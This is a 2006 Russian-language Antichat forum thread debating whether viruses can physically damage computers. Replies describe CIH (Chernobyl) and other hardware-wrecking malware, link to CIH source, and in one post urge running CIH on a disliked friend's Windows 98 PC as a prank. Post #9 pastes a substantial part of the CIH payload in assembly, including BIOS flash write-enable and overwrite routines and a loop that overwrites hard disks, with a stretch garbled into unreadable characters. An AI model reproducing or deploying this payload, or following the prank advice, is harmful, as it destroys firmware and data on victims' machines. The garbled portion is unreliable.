ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Спор:"Есть ли вири которые убивают железо"
  #1  
Старый 20.05.2006, 01:46
Аватар для Duke Nukem
Duke Nukem
Познающий
Регистрация: 15.02.2006
Сообщений: 43
Провел на форуме:
283891

Репутация: 9
Отправить сообщение для Duke Nukem с помощью ICQ
По умолчанию Спор:"Есть ли вири которые убивают железо"

Народ помогите разрешить спор - "Есть ли вири которые убивают железо"
В общем дело было так:

Я на учёбе, препод по О.С вызывает меня вещать про вирусы, я ему отвечаю и в конце он задаёт заключительный вопрос:
"Могут ли вирусы повредить аппаратную часть П.К" -

На что я ему ответил:"ДА Могут!!!"
Он усмехнулся....

И я ему обосновал, что стоит вирю получить доступ к BIOS и всё труба!!!!(К слову BIOS можно перепрошить чуть ли не через инет, и принцыпы построения практический одинаковые у всех фирм)

На что препод замолчал.....
Народ кто знает средства и алгоритмы воздействия на BIOS из под виндов, помогите уделать препода!

Последний раз редактировалось Duke Nukem; 20.05.2006 в 01:51..
 
Ответить с цитированием

  #2  
Старый 20.05.2006, 01:50
Аватар для Desr0w
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

Про биос ты обсулютно прав.
Придет Elect -поможет
А вот те + на удачу.
 
Ответить с цитированием

  #3  
Старый 20.05.2006, 01:53
Аватар для Duke Nukem
Duke Nukem
Познающий
Регистрация: 15.02.2006
Сообщений: 43
Провел на форуме:
283891

Репутация: 9
Отправить сообщение для Duke Nukem с помощью ICQ
По умолчанию

Desr0w - RESPEKT и уважуха старшим!!!!!!!
Пасиба за одобрение!!!
 
Ответить с цитированием

  #4  
Старый 20.05.2006, 09:48
Аватар для Elekt
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию

Вири такие есть =]

Ну, самое банальный и яркий пример - это конечно винчих(или чернобыль), который 26 апреля(или когда там была катастрофа на АС, да простит меня мой ОБЖ-шник) перепрошивал биос в мусор.
Кстати, винчиха до сих пор можно найти в вирусовых залежах инета(чего там тока не валяеться!). Не думаю, что он будет работать на современных машинах, но 1-е, 2-е и 3-и пеньки и их атлоновские аналоги под ударом.
Конечно же, должно быть разрешение на запись в биос(в биосе настройка типа"Protect" или джампер на матери).
Ходили ещё байки, что некоторые модификации модернизировали прошивку и изменяли частоту системной шины на недопустимую, но по-моему это уже гон.

СД-РОМ.
Есть такая гадость, называеться Crazy_CD. Это чудо, будуче запущенным, начинает до бесконечности открывать\закрывать лоток СД, чем очень быстро портит пассик и остальную механику.
Ещё был вирь, разгоняющий блин в СД до космических скоростей. Болванка, разумеется, не выдерживала и разлеталась на n кусков. Отсюда самые разнообразные повреждения.

Ну, можно упомянуть жёсткий диск.
Впринципе, форматирование - это тоже порча железа, как и информации, его изменение. Но это вообще не интересно.
Кажется существует вирус, стирающий служебные секторы, при порче которых восстановить работоспособность можно лишь на заводе-производителе.

Была зараза, разбивающая жёсткий на n логических дисков, размером каждый по 1.4 Мгб. Я не знаю, байка или нет, но говрят, что при кол-ве логических разделов, превышающем 1024 происходит порча(!!!) оперативной памяти. Тип уязвимой памяти мне не изестен.
 
Ответить с цитированием

  #5  
Старый 20.05.2006, 10:17
Аватар для Darkwayder
Darkwayder
Познающий
Регистрация: 20.05.2006
Сообщений: 41
Провел на форуме:
47107

Репутация: 16
По умолчанию

Когда ещё юзали ещё win 98 то один паренёк решил замутить вирус под названием cih. наверно все слышали про него. Вообщем от него комп и сгорает.
 
Ответить с цитированием

  #6  
Старый 20.05.2006, 10:25
Аватар для Dumkopff
Dumkopff
Познающий
Регистрация: 05.04.2006
Сообщений: 76
Провел на форуме:
2310584

Репутация: 73
По умолчанию

тут есть исходники CIH 1.4:
http://netch.ru/showthread.php?t=367
 
Ответить с цитированием

  #7  
Старый 20.05.2006, 10:33
Аватар для Darkwayder
Darkwayder
Познающий
Регистрация: 20.05.2006
Сообщений: 41
Провел на форуме:
47107

Репутация: 16
По умолчанию

На winXP не работает проверял . А вот на 98 жёсть прямо. У кого есть win98, например у друга которого терпеть не можете, запустите cih, ставьте 26 апреля и через несколько дней вы будете долго ржать.
 
Ответить с цитированием

  #8  
Старый 20.05.2006, 11:41
Аватар для Utochka
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию

Может выложите сюды исходник Cih 1.4: регаться там влом
 
Ответить с цитированием

  #9  
Старый 20.05.2006, 11:55
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

выложу тока часть, потому что он громадный
воть, самая безопасная часть этого вируса
Цитата:
; *************************************

; * Kill Computer !? ... *^_^* *

; *************************************



IsKillComputer:

; Get Now Day from BIOS CMOS

mov ah. 07@HЄrr¦Ш¦$#ТA!М1r

Г2Р@EH`

аЕdr Ш"!BEAТЛ-1САНЪ!B H-ФhCi\ШGМАМРНДЩ-re¬(РВ$-

gHAr]!RЙ (ЙАDH$Й4гАф

lАЄЫ4¦'@-

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; **************************************



; ***************************

; * Kill BIOS EEPROM *

; ***************************



mov bp, 0cf8h

lea esi, IOForEEPROM-@7[esi]



; ***********************

; * Show BIOS Page in *

; * 000E0000 - 000EFFFF *

; * ( 64 KB ) *

; ***********************



mov edi, 8000384ch

mov dx, 0cfeh

cli

call esi



; ***********************

; * Show BIOS Page in *

; * 000F0000 - 000FFFFF *

; * ( 64 KB ) *

; ***********************



mov di, 0058h

dec edx ; and al,0fh

mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h

call esi



; ***********************

; * Show the BIOS Extra *

; * ROM Data in Memory *

; * 000E0000 - 000E01FF *

; * ( 512 Bytes ) *

; * , and the Section *

; * of Extra BIOS can *

; * be Writted... *

; ***********************



lea ebx, EnableEEPROMToWrite-@10[esi]

mov eax, 0e5555h

mov ecx, 0e2aaah

call ebx

mov byte ptr [eax], 60h

push ecx

loop $



; ***********************

; * Kill the BIOS Extra *

; * ROM Data in Memory *

; * 000E0000 - 000E007F *

; * ( 80h Bytes ) *

; ***********************



xor ah, ah

mov [eax], al



xchg ecx, eax

loop $



; ***********************

; * Show and Enable the *

; * BIOS Main ROM Data *

; * 000E0000 - 000FFFFF *

; * ( 128 KB ) *

; * can be Writted... *

; ***********************



mov eax, 0f5555h

pop ecx

mov ch, 0aah

call ebx

mov byte ptr [eax], 20h



loop $



; ***********************

; * Kill the BIOS Main *

; * ROM Data in Memory *

; * 000FE000 - 000FE07F *

; * ( 80h Bytes ) *

; ***********************



mov ah, 0e0h

mov [eax], al



; ***********************

; * Hide BIOS Page in *

; * 000F0000 - 000FFFFF *

; * ( 64 KB ) *

; ***********************

; or al,10h

mov word ptr (BooleanCalculateCode-@10)[esi], 100ch

call esi



; ***************************

; * Kill All HardDisk *

; ************************************************** *

; * IOR Structure of IOS_SendCommand Needs *

; ************************************************** *

; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *

; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *

; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *

; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *

; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *

; ************************************************** *



KillHardDisk:

xor ebx, ebx

mov bh, FirstKillHardDiskNumber

push ebx

sub esp, 2ch

push 0c0001000h

mov bh, 08h

push ebx

push ecx

push ecx

push ecx

push 40000501h

inc ecx

push ecx

push ecx

mov esi, esp

sub esp, 0ach



LoopOfKillHardDisk:

int 20h

dd 00100004h ; VXDCall IOS_SendCommand

cmp word ptr [esi+06h], 0017h

je KillNextDataSection



ChangeNextHardDisk:

inc byte ptr [esi+4dh]

jmp LoopOfKillHardDisk



KillNextDataSection:

add dword ptr [esi+10h], ebx

mov byte ptr [esi+4dh], FirstKillHardDiskNumber

jmp LoopOfKillHardDisk
 
Ответить с цитированием

  #10  
Старый 20.05.2006, 12:00
Аватар для Darkwayder
Darkwayder
Познающий
Регистрация: 20.05.2006
Сообщений: 41
Провел на форуме:
47107

Репутация: 16
По умолчанию

Мдя виг такой вирус напишешь. А воще вирь написан на асамблере?

Последний раз редактировалось Darkwayder; 20.05.2006 в 12:10..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ